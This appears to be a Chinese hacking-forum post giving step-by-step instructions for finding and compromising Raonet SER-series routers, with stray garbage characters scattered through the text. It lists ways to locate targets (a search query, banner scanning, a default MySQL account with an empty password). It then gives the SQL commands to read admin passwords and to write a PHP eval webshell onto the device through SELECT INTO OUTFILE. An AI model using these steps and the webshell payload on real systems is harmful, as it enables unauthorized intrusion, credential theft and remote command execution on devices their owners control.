寻找存在漏洞的路由器方法:
2 U+ R& I, j0 k9 o
& J7 {+ n N* `- p- B. Z5 `1:google搜索'Raonet Subscriber Ethernet Router'
3 d; W! Z( n- {# ` J
0 M- v: h! X3 G! C i2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% Q: m0 u# g/ a2 `3 T+ g1 S' H( M5 a r$ o3 r, r- h4 v
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。. P# N7 {6 ?2 ]# ~+ @9 d J# _
C; {% ]$ O# T$ Z& q; E k- y
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......4 ]4 t9 `) r: |, p9 S/ |9 D9 m8 ?
4 d/ `5 \/ Z" M9 I9 j/ {
' A( U: C( L+ [2 k8 _: ^- W* W1 S& a/ |2 z; K
入侵步骤:1 F, u, d# E( I. P7 Q9 o
! h0 C9 n! Z$ e) l1 r) ^
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
: Y) A) `/ N+ j& j
0 e2 V- B" x) A- q9 r2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
' ?5 ~1 A: a4 G# V9 I! b% p3:得到密码后连接,查看GUI管理密码:% Q8 j" |, o) X. ?
use ser_500
" {- [, x' R: d4 S9 W' \, Wselect id,passwd from user;3 ^4 F* X& g* T
4:通过数据库写入webshell,执行命令:
0 _6 H% N9 |! P) h7 X3 d; H0 R2 }" Kuse mysql;. z- t, @( x4 p% [& L7 [2 Q
create table ok(cmd TEXT);
- L) i s ~5 h- |insert into ok values("<?php @eval($_POST[cmd])?>");
4 G6 i; H7 k5 ]' I/ y# O1 N9 xselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; v E( l8 a& X( t6 x- k6 B E$ ^, Wdrop table ok;1 \* R6 R3 i$ h9 D! p. }/ C
: } p/ J+ Q4 m' t2 E* T
5:连接后门shell.php - i% J0 J0 O/ j/ I5 W
" U. X2 c+ `9 D4 y: U6. 搞定!% ^8 H) e6 ?0 ~+ y; [
; i* S) X$ c9 I |